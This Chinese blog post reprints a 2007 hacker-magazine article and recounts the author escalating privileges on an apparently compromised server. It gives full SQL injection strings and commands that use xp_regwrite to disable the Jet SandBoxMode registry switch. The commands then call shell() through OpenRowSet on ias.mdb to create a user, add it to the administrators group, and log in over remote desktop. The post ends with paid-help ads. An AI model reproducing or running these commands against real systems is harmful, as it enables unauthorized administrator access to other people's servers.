一把“沙盒”提權(quán)

[重要通告]如您遇疑難雜癥,本站支持知識(shí)付費(fèi)業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時(shí)間哦!

一把“沙盒”提權(quán)
今天實(shí)踐了一把“沙盒”提權(quán)
文章登于2007年2月的黑客X檔案雜志
作者：職業(yè)欠錢

動(dòng)易出新洞，呆呆找到了后臺(tái)密碼，得到shell，su端口被改，沒別的途徑，數(shù)據(jù)庫連接帳號(hào)是SA，執(zhí)行命令的存儲(chǔ)過程無效（自己上傳了dll文件恢復(fù)了xp_cmdshell也沒用，OA_create和Job也試了，執(zhí)行命令無回顯），本欲放棄，想起前輩的一句話：“得到了SA拿不到system權(quán)限是水平問題”，于是仔細(xì)想了下，不能執(zhí)行命令，還有讀和寫文件的超級(jí)權(quán)限，而且注冊(cè)表的讀和寫權(quán)限也是有的，因此前輩的話非常有道理，有了這些權(quán)限，僅僅是不能執(zhí)行命令就放棄，太劃不來了。

想起一個(gè)沙盒的故事，那是很早以前，kevin1986還沒退出這個(gè)圈子，神秘兮兮的在賣一個(gè)工具，說是MDB注射時(shí)可以拿到system權(quán)限的工具，價(jià)錢不緋

大約一年后，這個(gè)真相終于被人公布了，引用一篇文章如下：
調(diào)用特殊函數(shù)實(shí)現(xiàn)SQL注入
首先我在(http://support.microsoft.com/kb/q239104/)這份資料知道在accessl里可以直接進(jìn)行sql查詢,具體的在Access中測(cè)試.測(cè)試的SQL語句如下:

Select shell('c:\windows\system32\cmd.exe /c net user ray 123 /ad');

查看計(jì)算機(jī)管理的本地用戶,馬上發(fā)現(xiàn)多出一個(gè)ray用戶,說明語句成功執(zhí)行了.接下來寫一個(gè)VBS腳本任意連接一個(gè)mdb來測(cè)試這個(gè)SQL語句

Set Conn=Createobject("Adodb.Connection")

Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=test.mdb"

Set Rs=Conn.execute("Select Shell(""cmd.exe /c net user ray 123 /ad"")")
Msgbox Rs(0)
運(yùn)行后會(huì)出現(xiàn)"表達(dá)式中的'Shell'函數(shù)未定義"的錯(cuò)誤,提到WINDOWS在Jet引擎中設(shè)置了一個(gè)名為SandBoxMode的開關(guān),它的注冊(cè)表位置在 HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,0為在任何所有者中中都禁止起用安全設(shè)置,1為僅在允許的范圍之內(nèi),2則是必須是Access的模式下,3則是完全開啟安全設(shè)置.默認(rèn)情況下為2,只能在Access 的模式下調(diào)用VBA的shell()函數(shù),我們嘗試將此注冊(cè)表值改為0,結(jié)果成功的運(yùn)行了VBS利用Jet引擎可以調(diào)用VBA的shell()函數(shù)執(zhí)行了系統(tǒng)命令.

通常一臺(tái)MSSQL服務(wù)器同時(shí)支持Access數(shù)據(jù)庫,所以只要有一個(gè)sa或者dbowner的連接,就滿足了修改注冊(cè)表的條件,因?yàn)镸SSQL有一個(gè)名為xp_regwrite的擴(kuò)展,它的作用是修改注冊(cè)表的值.語法如下
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value
如果存在一個(gè)sa或者dbowner的連接的SQL注入點(diǎn),就可以構(gòu)造出如下注入語句
InjectionURL;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'--
那我們將SandBoxMode開關(guān)的注冊(cè)表值修改為0就成功了.接著連接到一個(gè)Access數(shù)據(jù)庫中,就可以執(zhí)行系統(tǒng)命令,當(dāng)然執(zhí)行系統(tǒng)命令我們只需要一個(gè)Access數(shù)據(jù)庫相關(guān)Select的注入點(diǎn)或者直接用ASP文件Select調(diào)用這個(gè)VBA的 shell()函數(shù),但是實(shí)際上MSSQL有一個(gè)的OpenRowSet函數(shù),它的作用是打開一個(gè)特殊的數(shù)據(jù)庫或者連接到另一個(gè)數(shù)據(jù)庫之中.當(dāng)我們有一個(gè) SA權(quán)限連接的時(shí)候,就可以做到打開Jet引擎連接到一個(gè)Access數(shù)據(jù)庫,同時(shí)我們搜索系統(tǒng)文件會(huì)發(fā)現(xiàn)windows系統(tǒng)目錄下本身就存在兩個(gè) Access數(shù)據(jù)庫,位置在%windir%\system32\ias\ias.mdb或者%windir%\system32\ias\ dnary.mdb,這樣一來我們又可以利用OpenRowSet函數(shù)構(gòu)造出如下注入語句:
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user ray 123 /ad")');--
如果你覺得不大好懂的話，我可以給你做一個(gè)簡(jiǎn)化的理解：
1，Access可以調(diào)用VBS的函數(shù)，以System權(quán)限執(zhí)行任意命令
2，Access執(zhí)行這個(gè)命令是有條件的，需要一個(gè)開關(guān)被打開
3，這個(gè)開關(guān)在注冊(cè)表里
4，SA是有權(quán)限寫注冊(cè)表的
5，用SA寫注冊(cè)表的權(quán)限打開那個(gè)開關(guān)
6，調(diào)用Access里的執(zhí)行命令方法，以system權(quán)限執(zhí)行任意命令

所以，今天我使用HDSI的執(zhí)行SQL命令，執(zhí)行了以下命令：
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user zyqq 123 /add")');

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators zyqq /add")');
最后，用這個(gè)新加上的用戶，成功登陸3389！

據(jù)說DBO也有寫注冊(cè)表的權(quán)限，那么如果制作出一個(gè)專用的工具來，以后的提權(quán)道路確實(shí)會(huì)又寬廣了很多！不過DBO這個(gè)寫注冊(cè)表的權(quán)限我還沒有測(cè)試，一會(huì)測(cè)試了把報(bào)告發(fā)上來。

問題未解決？付費(fèi)解決問題加Q或微信 2589053300 (即Q號(hào)又微信號(hào))右上方掃一掃可加博主微信

所寫所說，是心之所感，思之所悟，行之所得；文當(dāng)無敷衍，落筆求簡(jiǎn)潔。 以所舍，求所獲；有所依，方所成！